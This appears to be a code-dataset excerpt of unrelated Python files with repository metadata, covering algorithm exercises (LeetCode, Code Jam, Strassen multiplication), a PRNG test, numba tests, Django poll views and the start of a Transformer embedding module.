lag_new = pd.DataFrame(map(lam_delta, time_converted_stamp['timestamp']), \
columns = [lag_name])
time_lagged = pd.concat([time_lagged, lag_new], axis = 1)
#datafrmae that contains all lagged time series (just time)
time_all = pd.concat([time_converted_str, time_lagged], axis = 1)
pred_lagged = pd.DataFrame()
for ii in range(1,time_all.shape[1]): #to loop through the lagged time series
print(time_all.columns[ii])
#extracting corresponding tag time series
lag_ts = pd.DataFrame(time_all.iloc[:,ii])
lag_ts.columns = ['date']
#merge the selected tlagged time with the predictor on = "date"
pred_new = pd.merge(pred, lag_ts, on = ['date'], how = 'right')
pred_new.drop('Unnamed: 0', axis = 1, inplace = True)
#sometimes nan values go to the bottom of the dataframe
#sort df by date -> reset the index -> remove old index
pred_new.sort_values(by = 'date', inplace=True)
pred_new.reset_index(inplace=True)
pred_new.drop('index', axis = 1, inplace= True)
#concatenate lagged dataframe
if ii == 1:
pred_lagged = pred_new
else:
pred_lagged = pd.concat([pred_lagged, pred_new.iloc[:,1:]], axis = 1)
#cd to saving directory
os.chdir(dir_out)
pred_lagged.to_csv(tg_name)
os.chdir(dir_in)
#run script
lag()
| [
"michaelg.tadesse@gmail.com"
] | michaelg.tadesse@gmail.com |
415734380444d4ca699f0a861cd5aedd158602cc | 50008b3b7fb7e14f793e92f5b27bf302112a3cb4 | /recipes/Python/577484_PRNG_Test/recipe-577484.py | 5f08e97722809089c21f45f274f0c10b6d28c1c0 | [
"MIT"
] | permissive | betty29/code-1 | db56807e19ac9cfe711b41d475a322c168cfdca6 | d097ca0ad6a6aee2180d32dce6a3322621f655fd | refs/heads/master | 2023-03-14T08:15:47.492844 | 2021-02-24T15:39:59 | 2021-02-24T15:39:59 | 341,878,663 | 0 | 0 | MIT | 2021-02-24T15:40:00 | 2021-02-24T11:31:15 | Python | UTF-8 | Python | false | false | 1,669 | py | # PRNG (Pseudo-Random Number Generator) Test
# PRNG info:
# http://en.wikipedia.org/wiki/Pseudorandom_number_generator
# FB - 201012046
# Compares output distribution of any given PRNG
# w/ an hypothetical True-Random Number Generator (TRNG)
import math
import time
global x
x = time.clock() # seed for the PRNG
# PRNG to test
def prng():
global x
x = math.fmod((x + math.pi) ** 2.0, 1.0)
return x
# combination by recursive method
def c(n, k):
if k == 0: return 1
if n == 0: return 0
return c(n - 1, k - 1) + c(n - 1, k)
### combination by multiplicative method
##def c_(n, k):
## mul = 1.0
## for i in range(k):
## mul = mul * (n - k + i + 1) / (i + 1)
## return mul
# MAIN
n = 20 # number of bits in each trial
print 'Test in progress...'
print
cnk = [] # array to hold bit counts
for k in range(n + 1):
cnk.append(0)
# generate 2**n n-bit pseudo-random numbers
for j in range(2 ** n):
# generate n-bit pseudo-random number and count the 0's in it
# num = ''
ctr = 0
for i in range(n):
b = int(round(prng())) # generate 1 pseudo-random bit
# num += str(b)
if b == 0: ctr += 1
# print num
# increase bit count in the array
cnk[ctr] += 1
print 'Number of bits in each pseudo-random number (n) =', n
print
print 'Comparison of "0" count distributions:'
print
print ' k', ' c(n,k)', ' actual', '%dif'
difSum = 0
for k in range(n + 1):
cnk_ = c(n, k)
dif = abs(cnk_ - cnk[k])
print '%2d %10d %10d %4d' % (k, cnk_, cnk[k], 100 * dif / cnk_)
difSum += dif
print
print 'Difference percentage between the distributions:'
print 100 * difSum / (2 ** n)
| [
"betty@qburst.com"
] | betty@qburst.com |
c3cb877e4a914b3e92f3fc6e05594d2242f19825 | f30f5024e2e9ce0dc5e550f7125bb7072fe96207 | /2019/r1a/prob2.py | 1baf96bf5ed1273a8b2431b64dcf1965199fdc76 | [] | no_license | RZachLamberty/google_code_jam | fcb14efed46c93cdc655ed932b6e3076bbe5b3ca | 0e1541db004ac47df5b63dd88f3e182a7a35e768 | refs/heads/master | 2021-12-01T02:04:32.506653 | 2021-11-16T20:33:04 | 2021-11-16T20:33:04 | 253,242,456 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,173 | py | import sys
def main():
T, N, M = [int(_) for _ in input().split(' ')]
for i_test_case in range(T):
options = None
lower_bound = 0
answer = '-1'
for n in [17, 16, 13, 11, 7, 5, 3]:
print(' '.join([str(n) for i in range(18)]))
sys.stdout.flush()
x = sum([int(_) for _ in input().split(' ')])
lower_bound = max(lower_bound, x)
mod = x % n
options_now = {i for i in range(lower_bound, M + 1) if i % n == mod}
if options is None:
options = options_now
else:
options.intersection_update(options_now)
# debug
# print("for me: len(options) = {}".format(len(options)))
# if len(options) < 10:
# print('options = {}'.format(options))
if len(options) == 1:
# guess
print(options.pop())
sys.stdout.flush()
answer = input()
break
if answer == '1':
continue
elif answer == '-1':
exit(1)
if __name__ == '__main__':
main()
| [
"r.zach.lamberty@gmail.com"
] | r.zach.lamberty@gmail.com |
e3bc4f76cf3ffb6a5b4786f53d8ebd7ebc637a52 | e6328c5076fe0f1b6819c3eacca08e1c4791199b | /062. Unique Paths/62. Unique Paths.py | 959174bdcbc2488be43001c17cf9725c173b9ad9 | [] | no_license | 603lzy/LeetCode | 16e818d94282b34ac153271697b512c79fc95ef5 | 9752533bc76ce5ecb881f61e33a3bc4b20dcf666 | refs/heads/master | 2020-06-14T03:07:03.148542 | 2018-10-22T14:10:33 | 2018-10-22T14:10:33 | 75,514,162 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 781 | py | class Solution(object):
def uniquePaths(self, m, n):
"""
:type m: int
:type n: int
:rtype: int
https://discuss.leetcode.com/topic/67900/dp-solution-in-python
# basic dynamic programming
"""
if m > 1 and n > 1:
grid = [[0 for col in xrange(n)] for row in xrange(m)]
for row in xrange(1, m):
grid[row][0] = 1
for col in xrange(1, n):
grid[0][col] = 1
for row in xrange(1, m):
for col in xrange(1, n):
grid[row][col] = grid[row][col - 1] + grid[row - 1][col]
return grid[m - 1][n - 1]
elif not m or not n:
return 0
else: # m = 1 or n = 1
return 1
| [
"noreply@github.com"
] | 603lzy.noreply@github.com |
6fd670ab5d1d479388517eba0c9275c274d3df7a | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_implemented.py | c8115b06a1c54a5a564f83c1619336ef47f28f30 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | py |
#calss header
class _IMPLEMENTED():
def __init__(self,):
self.name = "IMPLEMENTED"
self.definitions = implement
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['implement']
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
4606de08215d1e56e7f12b7187c4aec33337463e | 35f9def6e6d327d3a4a4f2959024eab96f199f09 | /developer/lab/ipython/tools/strassen_matrix_multiplication.py | 67c5a531feb4fea827e9edaf8764fa85bfef969d | [
"CAL-1.0-Combined-Work-Exception",
"CAL-1.0",
"MIT",
"CC-BY-SA-4.0",
"LicenseRef-scancode-free-unknown"
] | permissive | arXiv-research/DevLab-III-1 | ec10aef27e1ca75f206fea11014da8784752e454 | c50cd2b9154c83c3db5e4a11b9e8874f7fb8afa2 | refs/heads/main | 2023-04-16T19:24:58.758519 | 2021-04-28T20:21:23 | 2021-04-28T20:21:23 | 362,599,929 | 2 | 0 | MIT | 2021-04-28T20:36:11 | 2021-04-28T20:36:11 | null | UTF-8 | Python | false | false | 6,011 | py | from __future__ import annotations
import math
def default_matrix_multiplication(a: list, b: list) -> list:
"""
Multiplication only for 2x2 matrices
"""
if len(a) != 2 or len(a[0]) != 2 or len(b) != 2 or len(b[0]) != 2:
raise Exception("Matrices are not 2x2")
new_matrix = [
[a[0][0] * b[0][0] + a[0][1] * b[1][0], a[0][0] * b[0][1] + a[0][1] * b[1][1]],
[a[1][0] * b[0][0] + a[1][1] * b[1][0], a[1][0] * b[0][1] + a[1][1] * b[1][1]],
]
return new_matrix
def matrix_addition(matrix_a: list, matrix_b: list):
return [
[matrix_a[row][col] + matrix_b[row][col] for col in range(len(matrix_a[row]))]
for row in range(len(matrix_a))
]
def matrix_subtraction(matrix_a: list, matrix_b: list):
return [
[matrix_a[row][col] - matrix_b[row][col] for col in range(len(matrix_a[row]))]
for row in range(len(matrix_a))
]
def split_matrix(a: list) -> tuple[list, list, list, list]:
"""
Given an even length matrix, returns the top_left, top_right, bot_left, bot_right
quadrant.
>>> split_matrix([[4,3,2,4],[2,3,1,1],[6,5,4,3],[8,4,1,6]])
([[4, 3], [2, 3]], [[2, 4], [1, 1]], [[6, 5], [8, 4]], [[4, 3], [1, 6]])
>>> split_matrix([
... [4,3,2,4,4,3,2,4],[2,3,1,1,2,3,1,1],[6,5,4,3,6,5,4,3],[8,4,1,6,8,4,1,6],
... [4,3,2,4,4,3,2,4],[2,3,1,1,2,3,1,1],[6,5,4,3,6,5,4,3],[8,4,1,6,8,4,1,6]
... ]) # doctest: +NORMALIZE_WHITESPACE
([[4, 3, 2, 4], [2, 3, 1, 1], [6, 5, 4, 3], [8, 4, 1, 6]], [[4, 3, 2, 4],
[2, 3, 1, 1], [6, 5, 4, 3], [8, 4, 1, 6]], [[4, 3, 2, 4], [2, 3, 1, 1],
[6, 5, 4, 3], [8, 4, 1, 6]], [[4, 3, 2, 4], [2, 3, 1, 1], [6, 5, 4, 3],
[8, 4, 1, 6]])
"""
if len(a) % 2 != 0 or len(a[0]) % 2 != 0:
raise Exception("Odd matrices are not supported!")
matrix_length = len(a)
mid = matrix_length // 2
top_right = [[a[i][j] for j in range(mid, matrix_length)] for i in range(mid)]
bot_right = [
[a[i][j] for j in range(mid, matrix_length)] for i in range(mid, matrix_length)
]
top_left = [[a[i][j] for j in range(mid)] for i in range(mid)]
bot_left = [[a[i][j] for j in range(mid)] for i in range(mid, matrix_length)]
return top_left, top_right, bot_left, bot_right
def matrix_dimensions(matrix: list) -> tuple[int, int]:
return len(matrix), len(matrix[0])
def print_matrix(matrix: list) -> None:
for i in range(len(matrix)):
print(matrix[i])
def actual_strassen(matrix_a: list, matrix_b: list) -> list:
"""
Recursive function to calculate the product of two matrices, using the Strassen
Algorithm. It only supports even length matrices.
"""
if matrix_dimensions(matrix_a) == (2, 2):
return default_matrix_multiplication(matrix_a, matrix_b)
a, b, c, d = split_matrix(matrix_a)
e, f, g, h = split_matrix(matrix_b)
t1 = actual_strassen(a, matrix_subtraction(f, h))
t2 = actual_strassen(matrix_addition(a, b), h)
t3 = actual_strassen(matrix_addition(c, d), e)
t4 = actual_strassen(d, matrix_subtraction(g, e))
t5 = actual_strassen(matrix_addition(a, d), matrix_addition(e, h))
t6 = actual_strassen(matrix_subtraction(b, d), matrix_addition(g, h))
t7 = actual_strassen(matrix_subtraction(a, c), matrix_addition(e, f))
top_left = matrix_addition(matrix_subtraction(matrix_addition(t5, t4), t2), t6)
top_right = matrix_addition(t1, t2)
bot_left = matrix_addition(t3, t4)
bot_right = matrix_subtraction(matrix_subtraction(matrix_addition(t1, t5), t3), t7)
# construct the new matrix from our 4 quadrants
new_matrix = []
for i in range(len(top_right)):
new_matrix.append(top_left[i] + top_right[i])
for i in range(len(bot_right)):
new_matrix.append(bot_left[i] + bot_right[i])
return new_matrix
def strassen(matrix1: list, matrix2: list) -> list:
"""
>>> strassen([[2,1,3],[3,4,6],[1,4,2],[7,6,7]], [[4,2,3,4],[2,1,1,1],[8,6,4,2]])
[[34, 23, 19, 15], [68, 46, 37, 28], [28, 18, 15, 12], [96, 62, 55, 48]]
>>> strassen([[3,7,5,6,9],[1,5,3,7,8],[1,4,4,5,7]], [[2,4],[5,2],[1,7],[5,5],[7,8]])
[[139, 163], [121, 134], [100, 121]]
"""
if matrix_dimensions(matrix1)[1] != matrix_dimensions(matrix2)[0]:
raise Exception(
f"Unable to multiply these matrices, please check the dimensions. \n"
f"Matrix A:{matrix1} \nMatrix B:{matrix2}"
)
dimension1 = matrix_dimensions(matrix1)
dimension2 = matrix_dimensions(matrix2)
if dimension1[0] == dimension1[1] and dimension2[0] == dimension2[1]:
return [matrix1, matrix2]
maximum = max(max(dimension1), max(dimension2))
maxim = int(math.pow(2, math.ceil(math.log2(maximum))))
new_matrix1 = matrix1
new_matrix2 = matrix2
# Adding zeros to the matrices so that the arrays dimensions are the same and also
# power of 2
for i in range(0, maxim):
if i < dimension1[0]:
for j in range(dimension1[1], maxim):
new_matrix1[i].append(0)
else:
new_matrix1.append([0] * maxim)
if i < dimension2[0]:
for j in range(dimension2[1], maxim):
new_matrix2[i].append(0)
else:
new_matrix2.append([0] * maxim)
final_matrix = actual_strassen(new_matrix1, new_matrix2)
# Removing the additional zeros
for i in range(0, maxim):
if i < dimension1[0]:
for j in range(dimension2[1], maxim):
final_matrix[i].pop()
else:
final_matrix.pop()
return final_matrix
if __name__ == "__main__":
matrix1 = [
[2, 3, 4, 5],
[6, 4, 3, 1],
[2, 3, 6, 7],
[3, 1, 2, 4],
[2, 3, 4, 5],
[6, 4, 3, 1],
[2, 3, 6, 7],
[3, 1, 2, 4],
[2, 3, 4, 5],
[6, 2, 3, 1],
]
matrix2 = [[0, 2, 1, 1], [16, 2, 3, 3], [2, 2, 7, 7], [13, 11, 22, 4]]
print(strassen(matrix1, matrix2))
| [
"noreply@github.com"
] | arXiv-research.noreply@github.com |
cb5bd12ced8e3fde3e7611f283a940a293a4b659 | 0c8214d0d7827a42225b629b7ebcb5d2b57904b0 | /practice/P009_Fibonacci/main.py | 1b7ef28e71516019aa48df1f633f869dc72b79a3 | [] | no_license | mertturkmenoglu/python-examples | 831b54314410762c73fe2b9e77aee76fe32e24da | 394072e1ca3e62b882d0d793394c135e9eb7a56e | refs/heads/master | 2020-05-04T15:42:03.816771 | 2020-01-06T19:37:05 | 2020-01-06T19:37:05 | 179,252,826 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | # Dynamic programming example
fib_numbers = {1: 1, 2: 1, 3: 2}
def fibonacci(n: int) -> int:
if n not in fib_numbers:
fib_numbers[n] = fibonacci(n - 1) + fibonacci(n - 2)
return fib_numbers[n]
print(fibonacci(7))
print(fibonacci(5))
| [
"mertturkmenoglu99@gmail.com"
] | mertturkmenoglu99@gmail.com |
d669bec0e43de88d1d1a0659b251032840574b22 | 4388363ba45b95910c25bae3d9c02ad78f4a75d6 | /python/anaconda/lib/python2.7/site-packages/numba/tests/npyufunc/test_parallel_ufunc_issues.py | da86964467145527252c07a10e6ad5b9f1969a73 | [
"Python-2.0"
] | permissive | locolucco209/MongoScraper | d494e02531f4f165b1e821633dc9661c579337b5 | 74476c9f00ee43338af696da7e9cd02b273f9005 | refs/heads/master | 2022-11-25T19:09:27.248747 | 2018-07-10T03:54:06 | 2018-07-10T03:54:06 | 137,553,786 | 3 | 1 | null | 2022-11-16T04:32:26 | 2018-06-16T04:49:22 | null | UTF-8 | Python | false | false | 2,600 | py | from __future__ import print_function, absolute_import, division
import time
import ctypes
import numpy as np
from numba import unittest_support as unittest
from numba.tests.support import captured_stdout
from numba import vectorize
class TestParUfuncIssues(unittest.TestCase):
def test_thread_response(self):
"""
Related to #89.
This does not test #89 but tests the fix for it.
We want to make sure the worker threads can be used multiple times
and with different time gap between each execution.
"""
@vectorize('float64(float64, float64)', target='parallel')
def fnv(a, b):
return a + b
sleep_time = 1 # 1 second
while sleep_time > 0.00001: # 10us
time.sleep(sleep_time)
a = b = np.arange(10**5)
np.testing.assert_equal(a + b, fnv(a, b))
# Reduce sleep time
sleep_time /= 2
def test_gil_reacquire_deadlock(self):
"""
Testing issue #1998 due to GIL reacquiring
"""
# make a ctypes callback that requires the GIL
proto = ctypes.CFUNCTYPE(None, ctypes.c_int32)
characters = 'abcdefghij'
def bar(x):
print(characters[x])
cbar = proto(bar)
# our unit under test
@vectorize(['int32(int32)'], target='parallel', nopython=True)
def foo(x):
print(x % 10) # this reacquires the GIL
cbar(x % 10) # this reacquires the GIL
return x * 2
# Numpy ufunc has a heuristic to determine whether to release the GIL
# during execution. Small input size (10) seems to not release the GIL.
# Large input size (1000) seems to release the GIL.
for nelem in [1, 10, 100, 1000]:
# inputs
a = np.arange(nelem, dtype=np.int32)
acopy = a.copy()
# run and capture stdout
with captured_stdout() as buf:
got = foo(a)
stdout = buf.getvalue()
buf.close()
# process outputs from print
got_output = sorted(map(lambda x: x.strip(), stdout.splitlines()))
# build expected output
expected_output = [str(x % 10) for x in range(nelem)]
expected_output += [characters[x % 10] for x in range(nelem)]
expected_output = sorted(expected_output)
# verify
self.assertEqual(got_output, expected_output)
np.testing.assert_equal(got, 2 * acopy)
if __name__ == '__main__':
unittest.main()
| [
"lukemassetti@WestSide-Luke.local"
] | lukemassetti@WestSide-Luke.local |
4c8cb75900b6afaeafb66fec408097baedf5d1cc | 33f32d78087491e989289c46e5d2df5400e23946 | /leetcode/Unsorted_Algorthm_Problems/Two_Sum_III _Data_structure_design.py | ab9d7045ac0bbbde6e34441cdc36885146a1b6d5 | [] | no_license | xulleon/algorithm | 1b421989423640a44339e6edb21c054b6eb47a30 | b1f93854006a9b1e1afa4aadf80006551d492f8a | refs/heads/master | 2022-10-08T19:54:18.123628 | 2022-09-29T05:05:23 | 2022-09-29T05:05:23 | 146,042,161 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 899 | py | # https://leetcode.com/problems/two-sum-iii-data-structure-design/
class TwoSum:
def __init__(self):
"""
Initialize your data structure here.
"""
self.numbers = {}
def add(self, number: int) -> None:
"""
Add the number to an internal data structure..
"""
if number in self.numbers:
self.numbers[number] += 1
else:
self.numbers[number] = 1
def find(self, value: int) -> bool:
"""
Find if there exists any pair of numbers which sum is equal to the value.
"""
for number in self.numbers.keys():
number1 = value - number
if number1 != number:
if number1 in self.numbers:
return True
else:
if self.numbers[number] > 1:
return True
return False
| [
"leonxu@yahoo.com"
] | leonxu@yahoo.com |
d9cb29925147bcc00f6eeef81143924403f0db3e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03288/s528258523.py | e21295af8dcf6d86de0facff0a4bceaed3804dab | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 280 | py | import sys
import os
MOD = 10 ** 9 + 7
def main():
if os.getenv("LOCAL"):
sys.stdin = open("input.txt", "r")
N = int(sys.stdin.buffer.readline().rstrip())
print('AGC' if N >= 2800 else 'ARC' if N >= 1200 else 'ABC')
if __name__ == '__main__':
main()
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
b17f118b3a48f23411c0605dccbd4d3d7d5ac331 | c75ec82316ed5322c5844912ce9c528c24360b9f | /nsd1903/devweb/day03/mysite/polls/views.py | 34549e6b8acdfc67276252944f7264401ca3a21a | [] | no_license | MrZhangzhg/nsd2019 | a94cde22f2e4bd648bb9e56ca63827f558f3c083 | 54f6d2c7b348a69f13ad5f38f2fbdc8207528749 | refs/heads/master | 2021-08-22T17:38:27.697675 | 2020-02-22T08:36:21 | 2020-02-22T08:36:21 | 183,539,489 | 21 | 24 | null | 2020-05-17T12:07:55 | 2019-04-26T02:06:16 | HTML | UTF-8 | Python | false | false | 1,327 | py | from django.shortcuts import render, redirect
from .models import Question
# Create your views here.
def index(request):
# django将会把http请求作为参数传递给函数,因此,函数必须至少有一个参数
# return HttpResponse('<h1>首页</h1>')
# 取出所有问题,根据pub_date降序排列
questions = Question.objects.order_by('-pub_date')
return render(request, 'index.html', {'questions': questions})
def detail(request, question_id):
question = Question.objects.get(id=question_id)
return render(request, 'detail.html', {'question': question})
def vote(request, question_id):
question = Question.objects.get(id=question_id)
# request是用户的请求,POST是请求中的字典,保存着提交数据
choice_id = request.POST.get('choice_id')
# 通过问题的选项集取出对应的选项实例
choice = question.choice_set.get(id=choice_id)
choice.votes += 1 # 选项票数加1
choice.save()
# 使用重定向,url将会变成result的url,如果仍然使用render
# 那么url显示的是vote,但是页面是result的页面
return redirect('result', question_id)
def result(request, question_id):
question = Question.objects.get(id=question_id)
return render(request, 'result.html', {'question': question})
| [
"zhangzg@tedu.cn"
] | zhangzg@tedu.cn |
e13ae8c45049850fbfbfea34c7cd6ba0fef4b00a | 86d464653092d40abdbd2a125cb29af4de6ca44c | /experiment_scripts/inverted_indexing_test.py | be874046001a92303bd48125366d31b2f0190f11 | [] | no_license | lws803/CS3245 | ad6003729ead0bf871e131ca0c74676001a66f6a | b4c85388bb017fb21a4ccee14096230aeccecde9 | refs/heads/master | 2020-04-19T03:26:12.737752 | 2019-06-16T16:02:12 | 2019-06-16T16:02:12 | 167,934,428 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,398 | py | from nltk.stem import *
from nltk.probability import FreqDist
import nltk
stemmer = PorterStemmer()
text = "penyetted penyet"
text1 = "penyet test helloed"
text2 = "penyetted hello"
texts = [text, text1, text2]
dictionary = {}
for i in range(0, 3):
for word in nltk.word_tokenize(texts[i]):
word = stemmer.stem(word) # Stem it first
if (word not in dictionary):
dictionary[word] = [i]
else:
if (i not in dictionary[word]):
dictionary[word].append(i)
# Porter stemmer can remove the -ed and -s etc etc
for items in dictionary:
print items, " ", dictionary[items]
# Texts are ordered by their index in increasing order
query1 = "penyet"
query2 = "hello"
query1 = stemmer.stem(query1)
query2 = stemmer.stem(query2)
queries = [[len(dictionary[query1]), query1], [len(dictionary[query2]), query2]]
queries.sort() # Sort the queries so we tackle the smallest one first
# We want to find a text which contains both penyet and hello
p1 = 0
p2 = 0
foundTexts = {}
# We can check both of them at the same time as their arrays are sorted
while (p1 < len(dictionary[queries[0][1]]) and p2 < len(dictionary[queries[1][1]])):
index1 = dictionary[queries[0][1]][p1]
index2 = dictionary[queries[1][1]][p2]
if (index1 < index2):
p1 += 1 # If index1 < index2 then we move p1 up
elif (index2 < index1):
p2 += 1 # vice versa for this one as well
elif (index1 == index2):
foundTexts[index1] = True
p1 += 1
p2 += 1
print foundTexts.keys()
# We want to find a text which contains penyet but not hello
foundTexts = {}
p1 = 0
p2 = 0
while (p1 < len(dictionary["penyet"]) and p2 < len(dictionary["hello"])):
index1 = dictionary["penyet"][p1]
index2 = dictionary["hello"][p2]
if (index1 < index2):
foundTexts[index1] = True # Here we use a set instead as the index could be added in multiple times
# If index1 < index2, means index2 does not contain the article we want, else they would have both been matched
# In this case, the second condition of !"hello" has to be found from the second pointer
p1 += 1
elif (index1 > index2):
p2 += 1
elif (index1 == index2):
p1 += 1
p2 += 1
foundTexts.pop(index1, None) # If found later on in the list, then just pop it off
print foundTexts.keys()
| [
"lws803@gmail.com"
] | lws803@gmail.com |
5f246ef3eb4100549c48eb0f4832a833d1d6a4ed | e6cce25fb4159112d5a395a63aa024ac409b40d2 | /CHALLENGES/100TASK/ex010.py | 1c683bf8551b6a15bd8a3464c23792719ddae1e6 | [] | no_license | batestin1/PYTHON | 729225e6f1db029ec1e725eced5fe89e884cccb4 | f7fb74dd755acf37920dee6a6f9e3663141232e9 | refs/heads/master | 2023-06-23T03:27:14.951229 | 2021-07-22T22:54:20 | 2021-07-22T22:54:20 | 370,337,387 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | #Crie um programa que leia quanto dinheiro uma pessoa tem na carteira e mostre quantos dólares ela pode comprar.
import pandas
print('-*-'*30)
print('CONVERSAO DE DOLAR ')
print('Desenvolvido por Maycon Cypriano')
print('-*-'*30)
real = float(input('Quanto você tem na carteira: '))
dolar = real*0.18
print(f'Se você tem R$:{real} na carteira, então você tem USD:{round(dolar,2)}') | [
"mayconcipriano@gmail.com"
] | mayconcipriano@gmail.com |
882890653845d4203f7dbc442a563c4f17cbf708 | 19ca5093877d00b1cffcd0ec5c37e27ba2ceb347 | /lesson_03/task_2.py | a99b497abf4470a16621a728f53564a9eef35989 | [] | no_license | MichaelDc86/Algorythms | 10d424fb1bc667d088ecb7f8f01bf889ba2b6b22 | 072685eb045f0a29cc3abb7c008ef5677a7e5690 | refs/heads/master | 2020-05-15T23:57:41.608736 | 2019-05-29T06:39:35 | 2019-05-29T06:39:35 | 182,566,590 | 0 | 0 | null | 2019-05-29T06:39:36 | 2019-04-21T18:07:42 | Python | UTF-8 | Python | false | false | 943 | py | # Во втором массиве сохранить индексы четных элементов первого массива.
# Например, если дан массив со значениями 8, 3, 15, 6, 4, 2,
# второй массив надо заполнить значениями 1, 4, 5, 6 (или 0, 3, 4, 5, если индексация начинается с нуля),
# т.к. именно в этих позициях первого массива стоят четные числа.
import random
first = [random.randint(-99, 99) for _ in range(0, random.randint(1, 30))]
second = []
for position, i in enumerate(first):
if (i % 2) == 0:
second.append(position)
print(f'Первый массив случайных чисел: {first}')
print(f'Второй массив, содержащий индексы четных элементов первого(нумерация с "0"): {second}')
| [
"lenskymiwa@ya.ru"
] | lenskymiwa@ya.ru |
113e7e10a6f4f6f4126931c451a7af984bdf89c7 | b162de01d1ca9a8a2a720e877961a3c85c9a1c1c | /875.koko-eating-bananas.python3.py | 67a20e8d792a6529bc38998bc86ee2ac85df6a73 | [] | no_license | richnakasato/lc | 91d5ff40a1a3970856c76c1a53d7b21d88a3429c | f55a2decefcf075914ead4d9649d514209d17a34 | refs/heads/master | 2023-01-19T09:55:08.040324 | 2020-11-19T03:13:51 | 2020-11-19T03:13:51 | 114,937,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,378 | py | #
# [907] Koko Eating Bananas
#
# https://leetcode.com/problems/koko-eating-bananas/description/
#
# algorithms
# Medium (42.86%)
# Total Accepted: 7.6K
# Total Submissions: 17.7K
# Testcase Example: '[3,6,7,11]\n8'
#
# Koko loves to eat bananas. There are N piles of bananas, the i-th pile has
# piles[i] bananas. The guards have gone and will come back in H hours.
#
# Koko can decide her bananas-per-hour eating speed of K. Each hour, she
# chooses some pile of bananas, and eats K bananas from that pile. If the pile
# has less than K bananas, she eats all of them instead, and won't eat any more
# bananas during this hour.
#
# Koko likes to eat slowly, but still wants to finish eating all the bananas
# before the guards come back.
#
# Return the minimum integer K such that she can eat all the bananas within H
# hours.
#
#
#
#
#
#
#
# Example 1:
#
#
# Input: piles = [3,6,7,11], H = 8
# Output: 4
#
#
#
# Example 2:
#
#
# Input: piles = [30,11,23,4,20], H = 5
# Output: 30
#
#
#
# Example 3:
#
#
# Input: piles = [30,11,23,4,20], H = 6
# Output: 23
#
#
#
#
# Note:
#
#
# 1 <= piles.length <= 10^4
# piles.length <= H <= 10^9
# 1 <= piles[i] <= 10^9
#
#
#
#
#
#
class Solution:
def minEatingSpeed(self, piles, H):
"""
:type piles: List[int]
:type H: int
:rtype: int
"""
| [
"richnakasato@hotmail.com"
] | richnakasato@hotmail.com |
493992116f031f81f5b2f85c82bed18c7a906557 | 1a87ac9522591f25b03e6912ba3af3cca115abae | /authentication/views.py | babc97856be2925196aacd612175b88e59fbc097 | [
"MIT"
] | permissive | jyywong/InventoryMS | c67fdb0a051be5d136d9509e63b7fc0aeadcc324 | 9aac1324742730ce980e638f2156ece9eb44a593 | refs/heads/master | 2023-04-01T15:38:44.448813 | 2021-04-05T19:59:45 | 2021-04-05T19:59:45 | 350,162,598 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,802 | py | # -*- encoding: utf-8 -*-
"""
Copyright (c) 2019 - present AppSeed.us
"""
from django.shortcuts import render
# Create your views here.
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login
from django.contrib.auth.models import User
from django.forms.utils import ErrorList
from django.http import HttpResponse
from .forms import LoginForm, SignUpForm
def login_view(request):
form = LoginForm(request.POST or None)
msg = None
if request.method == "POST":
if form.is_valid():
username = form.cleaned_data.get("username")
password = form.cleaned_data.get("password")
user = authenticate(username=username, password=password)
if user is not None:
login(request, user)
return redirect("lab_list")
else:
msg = 'Invalid credentials'
else:
msg = 'Error validating the form'
return render(request, "accounts/login.html", {"form": form, "msg" : msg})
def register_user(request):
msg = None
success = False
if request.method == "POST":
form = SignUpForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get("username")
raw_password = form.cleaned_data.get("password1")
user = authenticate(username=username, password=raw_password)
msg = 'User created - please <a href="/login">login</a>.'
success = True
#return redirect("/login/")
else:
msg = 'Form is not valid'
else:
form = SignUpForm()
return render(request, "accounts/register.html", {"form": form, "msg" : msg, "success" : success })
| [
"wong.jonathan1@gmail.com"
] | wong.jonathan1@gmail.com |
40295ccd9ae060f231a5bedae45d9838221b52a3 | 01431aec3d6084b77faa62eae962c3a5ce07621a | /attention_is_all_you_need.py | 55b5443194eae9da8406c6123bbfa512c29aff15 | [] | no_license | jiyali/python-target-offer | e952cc77b0b3c4e4c77f5b9f67ef61bd7413354c | 214176b25caffea647f87bf816d3d712293c7c7f | refs/heads/master | 2020-07-29T05:53:57.930631 | 2020-05-13T15:04:08 | 2020-05-13T15:04:08 | 209,690,069 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,112 | py | # #############input Embedding ###############
class Embeddings(nn.Module):
def __init__(self, d_model, vocab):
super(Embeddings, self).__init__()
self.lut = nn.Embedding(vocab, d_model)
self.d_model = d_model # 表示embedding的维度
def forward(self, x):
return self.lut(x) * math.sqrt(self.d_model)
# #############Positional Encoding############
class PositionalEncoding(nn.Module):
"实现PE功能"
def __init__(self, d_model, dropout, max_len=5000):
super(PositionalEncoding, self).__init__()
self.dropout = nn.Dropout(p=dropout)
pe = torch.zeros(max_len, d_model)
position = torch.arange(0., max_len).unsqueeze(1)
